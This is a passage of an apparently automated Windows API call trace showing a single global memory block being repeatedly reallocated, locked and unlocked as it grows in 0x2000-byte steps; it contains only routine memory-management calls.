uFlags=0x2) returned 0xcc008c [0265.210] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0265.211] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0265.211] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.211] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x100000, uFlags=0x2) returned 0xcc008c [0265.237] GlobalLock (hMem=0xcc008c) returned 0x58f0020 [0265.238] GlobalHandle (pMem=0x58f0020) returned 0xcc008c [0265.238] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.238] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x102000, uFlags=0x2) returned 0xcc008c [0265.273] GlobalLock (hMem=0xcc008c) returned 0x5a00020 [0265.275] GlobalHandle (pMem=0x5a00020) returned 0xcc008c [0265.275] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.275] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x104000, uFlags=0x2) returned 0xcc008c [0265.300] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0265.301] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0265.301] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.301] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x106000, uFlags=0x2) returned 0xcc008c [0265.327] GlobalLock (hMem=0xcc008c) returned 0x5900020 [0265.329] GlobalHandle (pMem=0x5900020) returned 0xcc008c [0265.329] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.329] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x108000, uFlags=0x2) returned 0xcc008c [0265.354] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0265.355] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0265.356] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.356] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x10a000, uFlags=0x2) returned 0xcc008c [0265.385] GlobalLock (hMem=0xcc008c) returned 0x5900020 [0265.387] GlobalHandle (pMem=0x5900020) returned 0xcc008c [0265.387] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.387] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x10c000, uFlags=0x2) returned 0xcc008c [0265.422] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0265.423] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0265.423] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.423] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x10e000, uFlags=0x2) returned 0xcc008c [0265.452] GlobalLock (hMem=0xcc008c) returned 0x5900020 [0265.453] GlobalHandle (pMem=0x5900020) returned 0xcc008c [0265.453] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.453] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x110000, uFlags=0x2) returned 0xcc008c [0265.479] GlobalLock (hMem=0xcc008c) returned 0x5a10020 [0265.480] GlobalHandle (pMem=0x5a10020) returned 0xcc008c [0265.480] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.480] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x112000, uFlags=0x2) returned 0xcc008c [0265.507] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0265.508] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0265.508] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.508] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x114000, uFlags=0x2) returned 0xcc008c [0265.545] GlobalLock (hMem=0xcc008c) returned 0x5910020 [0265.547] GlobalHandle (pMem=0x5910020) returned 0xcc008c [0265.547] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.547] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x116000, uFlags=0x2) returned 0xcc008c [0265.573] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0265.575] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0265.575] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.575] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x118000, uFlags=0x2) returned 0xcc008c [0265.602] GlobalLock (hMem=0xcc008c) returned 0x5910020 [0265.603] GlobalHandle (pMem=0x5910020) returned 0xcc008c [0265.604] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.604] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x11a000, uFlags=0x2) returned 0xcc008c [0265.637] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0265.638] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0265.638] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.639] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x11c000, uFlags=0x2) returned 0xcc008c [0265.676] GlobalLock (hMem=0xcc008c) returned 0x5910020 [0265.677] GlobalHandle (pMem=0x5910020) returned 0xcc008c [0265.677] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.677] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x11e000, uFlags=0x2) returned 0xcc008c [0265.705] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0265.707] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0265.707] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.707] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x120000, uFlags=0x2) returned 0xcc008c [0265.736] GlobalLock (hMem=0xcc008c) returned 0x5910020 [0265.737] GlobalHandle (pMem=0x5910020) returned 0xcc008c [0265.737] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.737] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x122000, uFlags=0x2) returned 0xcc008c [0265.766] GlobalLock (hMem=0xcc008c) returned 0x5a40020 [0265.767] GlobalHandle (pMem=0x5a40020) returned 0xcc008c [0265.768] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.768] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x124000, uFlags=0x2) returned 0xcc008c [0265.807] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0265.808] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0265.808] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.808] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x126000, uFlags=0x2) returned 0xcc008c [0265.837] GlobalLock (hMem=0xcc008c) returned 0x5920020 [0265.838] GlobalHandle (pMem=0x5920020) returned 0xcc008c [0265.838] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.839] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x128000, uFlags=0x2) returned 0xcc008c [0265.868] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0265.869] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0265.869] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.869] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x12a000, uFlags=0x2) returned 0xcc008c [0265.907] GlobalLock (hMem=0xcc008c) returned 0x5920020 [0265.908] GlobalHandle (pMem=0x5920020) returned 0xcc008c [0265.908] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.908] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x12c000, uFlags=0x2) returned 0xcc008c [0265.937] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0265.939] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0265.939] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.939] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x12e000, uFlags=0x2) returned 0xcc008c [0265.969] GlobalLock (hMem=0xcc008c) returned 0x5920020 [0265.970] GlobalHandle (pMem=0x5920020) returned 0xcc008c [0265.970] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.970] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x130000, uFlags=0x2) returned 0xcc008c [0266.000] GlobalLock (hMem=0xcc008c) returned 0x5a50020 [0266.001] GlobalHandle (pMem=0x5a50020) returned 0xcc008c [0266.001] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.001] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x132000, uFlags=0x2) returned 0xcc008c [0266.041] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0266.042] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0266.042] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.042] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x134000, uFlags=0x2) returned 0xcc008c [0266.073] GlobalLock (hMem=0xcc008c) returned 0x5930020 [0266.074] GlobalHandle (pMem=0x5930020) returned 0xcc008c [0266.074] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.074] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x136000, uFlags=0x2) returned 0xcc008c [0266.113] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0266.114] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0266.114] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.114] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x138000, uFlags=0x2) returned 0xcc008c [0266.145] GlobalLock (hMem=0xcc008c) returned 0x5930020 [0266.146] GlobalHandle (pMem=0x5930020) returned 0xcc008c [0266.146] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.146] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x13a000, uFlags=0x2) returned 0xcc008c [0266.188] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0266.189] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0266.189] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.189] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x13c000, uFlags=0x2) returned 0xcc008c [0266.221] GlobalLock (hMem=0xcc008c) returned 0x5930020 [0266.222] GlobalHandle (pMem=0x5930020) returned 0xcc008c [0266.222] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.222] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x13e000, uFlags=0x2) returned 0xcc008c [0266.255] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0266.256] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0266.256] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.256] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x140000, uFlags=0x2) returned 0xcc008c [0266.289] GlobalLock (hMem=0xcc008c) returned 0x5930020 [0266.290] GlobalHandle (pMem=0x5930020) returned 0xcc008c [0266.290] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.290] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x142000, uFlags=0x2) returned 0xcc008c [0266.332] GlobalLock (hMem=0xcc008c) returned 0x5a80020 [0266.333] GlobalHandle (pMem=0x5a80020) returned 0xcc008c [0266.333] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.333] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x144000, uFlags=0x2) returned 0xcc008c [0266.367] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0266.368] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0266.368] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.368] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x146000, uFlags=0x2) returned 0xcc008c [0266.401] GlobalLock (hMem=0xcc008c) returned 0x5940020 [0266.402] GlobalHandle (pMem=0x5940020) returned 0xcc008c [0266.402] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.402] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x148000, uFlags=0x2) returned 0xcc008c [0266.445] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0266.446] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0266.446] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.447] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x14a000, uFlags=0x2) returned 0xcc008c [0266.480] GlobalLock (hMem=0xcc008c) returned 0x5940020 [0266.481] GlobalHandle (pMem=0x5940020) returned 0xcc008c [0266.481] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.481] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x14c000, uFlags=0x2) returned 0xcc008c [0266.515] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0266.516] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0266.516] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.516] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x14e000, uFlags=0x2) returned 0xcc008c [0266.549] GlobalLock (hMem=0xcc008c) returned 0x5940020 [0266.550] GlobalHandle (pMem=0x5940020) returned 0xcc008c [0266.550] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.551] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x150000, uFlags=0x2) returned 0xcc008c [0266.593] GlobalLock (hMem=0xcc008c) returned 0x5a90020 [0266.594] GlobalHandle (pMem=0x5a90020) returned 0xcc008c [0266.595] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.595] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x152000, uFlags=0x2) returned 0xcc008c [0266.629] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0266.630] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0266.630] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.630] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x154000, uFlags=0x2) returned 0xcc008c [0266.662] GlobalLock (hMem=0xcc008c) returned 0x5950020 [0266.663] GlobalHandle (pMem=0x5950020) returned 0xcc008c [0266.664] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.664] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x156000, uFlags=0x2) returned 0xcc008c [0266.713] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0266.714] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0266.714] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.714] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x158000, uFlags=0x2) returned 0xcc008c [0266.749] GlobalLock (hMem=0xcc008c) returned 0x5950020 [0266.750] GlobalHandle (pMem=0x5950020) returned 0xcc008c [0266.750] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.750] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x15a000, uFlags=0x2) returned 0xcc008c [0266.784] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0266.785] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0266.785] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.785] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x15c000, uFlags=0x2) returned 0xcc008c [0266.821] GlobalLock (hMem=0xcc008c) returned 0x5950020 [0266.823] GlobalHandle (pMem=0x5950020) returned 0xcc008c [0266.823] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.823] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x15e000, uFlags=0x2) returned 0xcc008c [0266.867] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0266.868] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0266.868] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.868] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x160000, uFlags=0x2) returned 0xcc008c [0266.904] GlobalLock (hMem=0xcc008c) returned 0x5950020 [0266.905] GlobalHandle (pMem=0x5950020) returned 0xcc008c [0266.905] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.905] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x162000, uFlags=0x2) returned 0xcc008c [0266.940] GlobalLock (hMem=0xcc008c) returned 0x5ac0020 [0266.941] GlobalHandle (pMem=0x5ac0020) returned 0xcc008c [0266.941] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.941] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x164000, uFlags=0x2) returned 0xcc008c [0266.985] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0266.987] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0266.987] GlobalUnlock (hMem=0xcc008c) returned 0 [0266.987] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x166000, uFlags=0x2) returned 0xcc008c [0267.022] GlobalLock (hMem=0xcc008c) returned 0x5960020 [0267.023] GlobalHandle (pMem=0x5960020) returned 0xcc008c [0267.023] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.023] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x168000, uFlags=0x2) returned 0xcc008c [0267.059] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0267.060] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0267.060] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.060] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x16a000, uFlags=0x2) returned 0xcc008c [0267.106] GlobalLock (hMem=0xcc008c) returned 0x5960020 [0267.108] GlobalHandle (pMem=0x5960020) returned 0xcc008c [0267.108] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.108] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x16c000, uFlags=0x2) returned 0xcc008c [0267.147] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0267.148] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0267.148] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.148] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x16e000, uFlags=0x2) returned 0xcc008c [0267.184] GlobalLock (hMem=0xcc008c) returned 0x5960020 [0267.185] GlobalHandle (pMem=0x5960020) returned 0xcc008c [0267.185] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.185] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x170000, uFlags=0x2) returned 0xcc008c [0267.222] GlobalLock (hMem=0xcc008c) returned 0x5ad0020 [0267.223] GlobalHandle (pMem=0x5ad0020) returned 0xcc008c [0267.223] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.223] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x172000, uFlags=0x2) returned 0xcc008c [0267.279] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0267.280] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0267.280] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.280] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x174000, uFlags=0x2) returned 0xcc008c [0267.316] GlobalLock (hMem=0xcc008c) returned 0x5970020 [0267.317] GlobalHandle (pMem=0x5970020) returned 0xcc008c [0267.317] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.317] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x176000, uFlags=0x2) returned 0xcc008c [0267.355] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0267.356] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0267.356] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.356] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x178000, uFlags=0x2) returned 0xcc008c [0267.402] GlobalLock (hMem=0xcc008c) returned 0x5970020 [0267.403] GlobalHandle (pMem=0x5970020) returned 0xcc008c [0267.403] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.403] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x17a000, uFlags=0x2) returned 0xcc008c [0267.439] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0267.440] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0267.440] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.441] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x17c000, uFlags=0x2) returned 0xcc008c [0267.477] GlobalLock (hMem=0xcc008c) returned 0x5970020 [0267.478] GlobalHandle (pMem=0x5970020) returned 0xcc008c [0267.478] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.478] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x17e000, uFlags=0x2) returned 0xcc008c [0267.524] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0267.525] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0267.525] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.525] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x180000, uFlags=0x2) returned 0xcc008c [0267.562] GlobalLock (hMem=0xcc008c) returned 0x5970020 [0267.563] GlobalHandle (pMem=0x5970020) returned 0xcc008c [0267.563] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.563] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x182000, uFlags=0x2) returned 0xcc008c [0267.600] GlobalLock (hMem=0xcc008c) returned 0x5b00020 [0267.602] GlobalHandle (pMem=0x5b00020) returned 0xcc008c [0267.602] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.602] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x184000, uFlags=0x2) returned 0xcc008c [0267.650] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0267.651] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0267.651] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.651] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x186000, uFlags=0x2) returned 0xcc008c [0267.689] GlobalLock (hMem=0xcc008c) returned 0x5980020 [0267.690] GlobalHandle (pMem=0x5980020) returned 0xcc008c [0267.690] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.690] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x188000, uFlags=0x2) returned 0xcc008c [0267.728] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0267.730] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0267.730] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.730] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x18a000, uFlags=0x2) returned 0xcc008c [0267.778] GlobalLock (hMem=0xcc008c) returned 0x5980020 [0267.779] GlobalHandle (pMem=0x5980020) returned 0xcc008c [0267.779] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.779] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x18c000, uFlags=0x2) returned 0xcc008c [0267.819] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0267.821] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0267.821] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.821] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x18e000, uFlags=0x2) returned 0xcc008c [0267.860] GlobalLock (hMem=0xcc008c) returned 0x5980020 [0267.862] GlobalHandle (pMem=0x5980020) returned 0xcc008c [0267.862] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.862] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x190000, uFlags=0x2) returned 0xcc008c [0267.911] GlobalLock (hMem=0xcc008c) returned 0x5b10020 [0267.912] GlobalHandle (pMem=0x5b10020) returned 0xcc008c [0267.912] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.912] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x192000, uFlags=0x2) returned 0xcc008c [0267.951] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0267.952] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0267.952] GlobalUnlock (hMem=0xcc008c) returned 0 [0267.952] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x194000, uFlags=0x2) returned 0xcc008c [0268.002] GlobalLock (hMem=0xcc008c) returned 0x5990020 [0268.003] GlobalHandle (pMem=0x5990020) returned 0xcc008c [0268.003] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.003] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x196000, uFlags=0x2) returned 0xcc008c [0268.043] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0268.045] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0268.045] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.045] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x198000, uFlags=0x2) returned 0xcc008c [0268.087] GlobalLock (hMem=0xcc008c) returned 0x5990020 [0268.089] GlobalHandle (pMem=0x5990020) returned 0xcc008c [0268.089] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.089] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x19a000, uFlags=0x2) returned 0xcc008c [0268.141] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0268.143] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0268.143] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.143] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x19c000, uFlags=0x2) returned 0xcc008c [0268.186] GlobalLock (hMem=0xcc008c) returned 0x5990020 [0268.187] GlobalHandle (pMem=0x5990020) returned 0xcc008c [0268.187] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.187] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x19e000, uFlags=0x2) returned 0xcc008c [0268.230] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0268.232] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0268.232] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.232] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1a0000, uFlags=0x2) returned 0xcc008c [0268.287] GlobalLock (hMem=0xcc008c) returned 0x5990020 [0268.288] GlobalHandle (pMem=0x5990020) returned 0xcc008c [0268.288] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.288] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1a2000, uFlags=0x2) returned 0xcc008c [0268.341] GlobalLock (hMem=0xcc008c) returned 0x5b40020 [0268.342] GlobalHandle (pMem=0x5b40020) returned 0xcc008c [0268.342] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.342] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1a4000, uFlags=0x2) returned 0xcc008c [0268.387] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0268.388] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0268.388] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.388] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1a6000, uFlags=0x2) returned 0xcc008c [0268.444] GlobalLock (hMem=0xcc008c) returned 0x59a0020 [0268.445] GlobalHandle (pMem=0x59a0020) returned 0xcc008c [0268.445] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.445] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1a8000, uFlags=0x2) returned 0xcc008c [0268.489] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0268.491] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0268.491] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.491] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1aa000, uFlags=0x2) returned 0xcc008c [0268.537] GlobalLock (hMem=0xcc008c) returned 0x59a0020 [0268.538] GlobalHandle (pMem=0x59a0020) returned 0xcc008c [0268.538] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.538] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1ac000, uFlags=0x2) returned 0xcc008c [0268.595] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0268.597] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0268.597] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.597] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1ae000, uFlags=0x2) returned 0xcc008c [0268.644] GlobalLock (hMem=0xcc008c) returned 0x59a0020 [0268.645] GlobalHandle (pMem=0x59a0020) returned 0xcc008c [0268.645] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.645] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1b0000, uFlags=0x2) returned 0xcc008c [0268.703] GlobalLock (hMem=0xcc008c) returned 0x5b50020 [0268.705] GlobalHandle (pMem=0x5b50020) returned 0xcc008c [0268.705] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.705] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1b2000, uFlags=0x2) returned 0xcc008c [0268.753] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0268.754] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0268.754] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.754] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1b4000, uFlags=0x2) returned 0xcc008c [0268.801] GlobalLock (hMem=0xcc008c) returned 0x59b0020 [0268.803] GlobalHandle (pMem=0x59b0020) returned 0xcc008c [0268.803] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.803] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1b6000, uFlags=0x2) returned 0xcc008c [0268.861] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0268.863] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0268.863] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.863] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1b8000, uFlags=0x2) returned 0xcc008c [0268.910] GlobalLock (hMem=0xcc008c) returned 0x59b0020 [0268.911] GlobalHandle (pMem=0x59b0020) returned 0xcc008c [0268.911] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.911] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1ba000, uFlags=0x2) returned 0xcc008c [0268.973] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0268.974] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0268.974] GlobalUnlock (hMem=0xcc008c) returned 0 [0268.974] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1bc000, uFlags=0x2) returned 0xcc008c [0269.021] GlobalLock (hMem=0xcc008c) returned 0x59b0020 [0269.022] GlobalHandle (pMem=0x59b0020) returned 0xcc008c [0269.022] GlobalUnlock (hMem=0xcc008c) returned 0 [0269.022] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1be000, uFlags=0x2) returned 0xcc008c [0269.441] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0269.442] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0269.442] GlobalUnlock (hMem=0xcc008c) returned 0 [0269.442] 